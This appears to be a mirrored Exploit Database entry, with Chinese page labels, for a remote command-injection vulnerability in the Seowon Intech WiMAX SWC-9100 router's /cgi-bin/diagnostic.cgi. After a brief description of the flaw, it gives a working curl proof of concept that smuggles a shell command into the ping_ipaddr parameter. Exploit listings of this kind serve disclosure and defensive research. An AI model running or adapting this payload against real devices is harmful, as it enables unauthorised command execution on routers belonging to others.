Seowon Intech WiMAX SWC-9100 Router – ‘/cgi-bin/diagnostic.cgi?ping_ipaddr’ Remote Code Execution

• Exploit Database
• 13 阅读

• 作者： Josue Rojas
  日期： 2014-02-03
• 类别：

  • remote
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/39074/

• source: https://www.securityfocus.com/bid/65306/info
   
  WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.
   
  Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device.
   
  curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls 
  -lash /etc%23&ping_count=1&action=Apply&html_view=ping" 
  "http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null